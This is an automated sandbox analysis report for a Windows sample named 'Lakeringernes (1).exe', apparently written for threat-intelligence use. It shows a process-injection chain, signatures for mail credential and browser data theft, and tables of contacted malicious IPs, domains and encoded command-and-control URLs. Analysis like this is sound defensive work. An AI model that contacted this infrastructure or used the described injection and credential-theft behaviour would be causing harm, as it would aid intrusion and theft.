behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755081 Sample: Lakeringernes (1).exe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 31 xn--29-oj9ik7b890b.net 2->31 33 www.youlian.fund 2->33 35 20 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 10 Lakeringernes (1).exe 2 33 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 65 Tries to detect Any.run 10->65 14 Lakeringernes (1).exe 6 10->14         started        signatures6 process7 dnsIp8 43 drive.google.com 142.250.184.206, 443, 49809 GOOGLEUS United States 14->43 45 googlehosted.l.googleusercontent.com 142.250.185.161, 443, 49811 GOOGLEUS United States 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 2 other signatures 14->73 18 RAVCpl64.exe 14->18 injected signatures9 process10 process11 20 wscript.exe 13 18->20         started        signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Writes to foreign memory regions 20->59 61 3 other signatures 20->61 23 explorer.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.youlian.fund 154.204.24.45, 49867, 49868, 49869 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 23->37 39 www.rsvstudio.com 156.254.172.36, 49857, 49858, 49859 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 23->39 41 12 other IPs or domains 23->41 63 System process connects to network (likely due to code injection or exploit) 23->63 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
156.254.172.36
 www.rsvstudio.com Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
154.213.44.213
 www.planetthermo.net Seychelles
132839 POWERLINE-AS-APPOWERLINEDATACENTERHK true
154.204.24.45
 www.youlian.fund Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
162.0.238.93
 automotiveparts-store.com Canada
22612 NAMECHEAP-NETUS true
96.43.100.185
 www.plentywindshield.com United States
64050 BCPL-SGBGPNETGlobalASNSG true
104.21.23.41
 www.aceadora.shop United States
13335 CLOUDFLARENETUS true
156.230.149.244
 www.mangal20.com Seychelles
134705 ITACE-AS-APItaceInternationalLimitedHK true
3.64.163.50
 www.avatarworker.com United States
16509 AMAZON-02US true
23.106.120.176
 techrocker.com Singapore
59253 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG true
66.29.151.40
 www.gouldent.site United States
19538 ADVANTAGECOMUS true
142.250.185.161
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.184.206
 drive.google.com United States
15169 GOOGLEUS false
50.87.192.144
 xn--29-oj9ik7b890b.net United States
46606 UNIFIEDLAYER-AS-1US true
103.63.2.175
 www.005404.com Hong Kong
132742 GGL-AS-APGuochaoGrouplimitedHK true
168.76.162.220
 www.livinghopedoula.com South Africa
265240 ULTRANETSERVICOSEMINTERNETLTDABR true
104.21.48.6
 www.haveusstampsale.shop United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.rsvstudio.com 156.254.172.36 true
www.avatarworker.com 3.64.163.50 true
xn--29-oj9ik7b890b.net 50.87.192.144 true
www.haveusstampsale.shop 104.21.48.6 true
www.youlian.fund 154.204.24.45 true
automotiveparts-store.com 162.0.238.93 true
www.005404.com 103.63.2.175 true
techrocker.com 23.106.120.176 true
www.livinghopedoula.com 168.76.162.220 true
www.plentywindshield.com 96.43.100.185 true
www.mangal20.com 156.230.149.244 true
www.gouldent.site 66.29.151.40 true
www.planetthermo.net 154.213.44.213 true
drive.google.com 142.250.184.206 true
www.aceadora.shop 104.21.23.41 true
googlehosted.l.googleusercontent.com 142.250.185.161 true
doc-00-7s-docs.googleusercontent.com unknown unknown
www.automotiveparts-store.com unknown unknown
www.techrocker.com unknown unknown
www.xn--29-oj9ik7b890b.net unknown unknown
www.sabzi.lol unknown unknown
www.caglaakdag.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.techrocker.com/i036/ true
  • Avira URL Cloud: safe
 low
http://www.rsvstudio.com/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.aceadora.shop/i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK+63l9AWb1/ssE5X6NYSlv5byLnNWr+FpxZxtTvuFnXWw==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.youlian.fund/i036/?k0GP1N2=LMIqSMdQ3q0mQ0O8E4Be7P+zrPM6Gg4aprrhhSoZXI8N9fokAeXZtK7CAx7jxtppbBVDda4uu0E3KjN/+XSSDpZJ6husVXmnlg==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.techrocker.com/i036/?k0GP1N2=Nt7we/gwvJafOenmPtqMdMQq0A5S+F0mCo2A/o6NNSBEDFrZxTdugE3hHqQHgmQnwi6pFnnhcgi6C1+qKckarzI1zqVfAVRktw==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.rsvstudio.com/i036/?k0GP1N2=ronhS2NZk+RpAH8xyVeuvsbzfj1G+JCO7SbBJB6VTjQ5GvCPMYygorm2sXuQ6whLqX4zWjebsFwcRWcR3e6VRFoMUbeOjCqRvg==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.haveusstampsale.shop/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.planetthermo.net/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.xn--29-oj9ik7b890b.net/i036/?k0GP1N2=BZwpaihTGJGWcZJSAe2sxznsnPej0JxCYfoQvgCgbuMQP061bK/C39YT663oVlO5elykthEFB/Dcn8VFPsLzIGidWMmSTKgllQ==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.automotiveparts-store.com/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.xn--29-oj9ik7b890b.net/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.mangal20.com/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.mangal20.com/i036/?k0GP1N2=Ypm+0+Vc/krk+syJRkmS/ZXdqh86ue5y1szx5SRmlweqmqT2L40Pqi55gxfwp+7cpcP0UgmrVUc/vOiRo42zU0SjFnllzv841Q==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.techrocker.com/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.haveusstampsale.shop/i036/?k0GP1N2=DDTM8NTjTGQKNl9ZmiWQMqmzY5hUHu6DmELfmDs1vEv26+wpTDEFgWjPjGJv2unzSeE04u298BAHHYXe+vHUgcxZ13bZmjQmZA==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.aceadora.shop/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.gouldent.site/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.livinghopedoula.com/i036/ true
  • Avira URL Cloud: safe
 unknown
http://www.livinghopedoula.com/i036/?k0GP1N2=gK12bHhqEy0e4Uj/ImUnYxfT+EkUqBjjVPatb5GnWKdwUy9sF2E4a2NySHYDGj5+R015BuqmsIpMnBRMM6PNmRTNIYpZBhLGAQ==&Rzu=hV1Pon true
  • Avira URL Cloud: safe
 unknown
http://www.005404.com/i036/ true
  • Avira URL Cloud: safe
 unknown